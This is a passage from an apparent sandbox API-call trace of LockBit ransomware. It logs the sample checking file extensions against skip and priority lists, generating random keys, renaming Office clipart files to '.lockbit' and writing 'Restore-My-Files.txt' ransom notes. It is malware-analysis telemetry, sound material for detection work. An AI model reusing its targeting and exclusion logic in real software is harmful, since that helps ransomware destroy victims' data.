(lpString1=".reg", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02127_.WMF") returned 1 [0163.707] lstrcmpiW (lpString1="ntldr", lpString2="NA02127_.WMF") returned 1 [0163.708] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02127_.WMF") returned 1 [0163.708] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02127_.WMF") returned -1 [0163.708] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02127_.WMF") returned -1 [0163.708] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02127_.WMF") returned 1 [0163.708] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02127_.WMF") returned -1 [0163.708] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.708] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02127_.WMF") returned=".WMF" [0163.708] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.708] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.708] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.708] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.708] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.708] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.708] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.708] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.708] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.708] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.708] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.708] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.708] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.709] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.709] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02127_.WMF.lockbit") returned 72 [0163.709] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02127_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02127_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0163.729] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.729] malloc (_Size=0x40068) returned 0x3df0008 [0163.729] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4068) returned 1 [0163.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0163.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.731] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0163.731] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0163.733] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02127_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02127_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.733] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.733] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.734] free (_Block=0x1fa2ed8) [0163.734] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02127_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.734] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.734] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.734] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd00, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02262_.WMF", cAlternateFileName="")) returned 1 [0163.734] lstrcmpiW (lpString1=".", lpString2="NA02262_.WMF") returned -1 [0163.734] lstrcmpiW (lpString1="..", lpString2="NA02262_.WMF") returned -1 [0163.734] PathFindExtensionW (pszPath="NA02262_.WMF") returned=".WMF" [0163.734] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.734] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.734] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.735] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.735] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.735] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.737] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.738] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.738] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02262_.WMF") returned 1 [0163.739] lstrcmpiW (lpString1="ntldr", lpString2="NA02262_.WMF") returned 1 [0163.739] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02262_.WMF") returned 1 [0163.739] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02262_.WMF") returned -1 [0163.739] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02262_.WMF") returned -1 [0163.739] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02262_.WMF") returned 1 [0163.739] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02262_.WMF") returned -1 [0163.739] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.739] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02262_.WMF") returned=".WMF" [0163.739] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.739] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.739] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.740] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.740] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02262_.WMF.lockbit") returned 72 [0163.740] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02262_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0163.741] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.741] malloc (_Size=0x40068) returned 0x1ff1e60 [0163.741] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3328) returned 1 [0163.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0163.742] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0163.747] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.800] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02262_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02262_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.800] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.801] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.802] free (_Block=0x1fa2ed8) [0163.802] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02262_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.802] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.802] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.802] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02264_.WMF", cAlternateFileName="")) returned 1 [0163.802] lstrcmpiW (lpString1=".", lpString2="NA02264_.WMF") returned -1 [0163.802] lstrcmpiW (lpString1="..", lpString2="NA02264_.WMF") returned -1 [0163.803] PathFindExtensionW (pszPath="NA02264_.WMF") returned=".WMF" [0163.803] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.803] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.804] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.804] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02264_.WMF") returned 1 [0163.805] lstrcmpiW (lpString1="ntldr", lpString2="NA02264_.WMF") returned 1 [0163.805] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02264_.WMF") returned 1 [0163.805] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02264_.WMF") returned -1 [0163.805] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02264_.WMF") returned -1 [0163.805] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02264_.WMF") returned 1 [0163.805] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02264_.WMF") returned -1 [0163.805] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.805] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02264_.WMF") returned=".WMF" [0163.805] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.805] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.805] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.806] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.806] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02264_.WMF.lockbit") returned 72 [0163.806] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02264_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02264_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0163.807] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.808] malloc (_Size=0x40068) returned 0x3df0008 [0163.808] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2272) returned 1 [0163.808] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.808] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0163.808] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.809] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0163.809] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0163.887] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02264_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02264_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.887] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.887] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.061] free (_Block=0x1fa2ed8) [0164.061] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02264_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.062] wsprintfW (in: param_1=0x3d6b4a0, 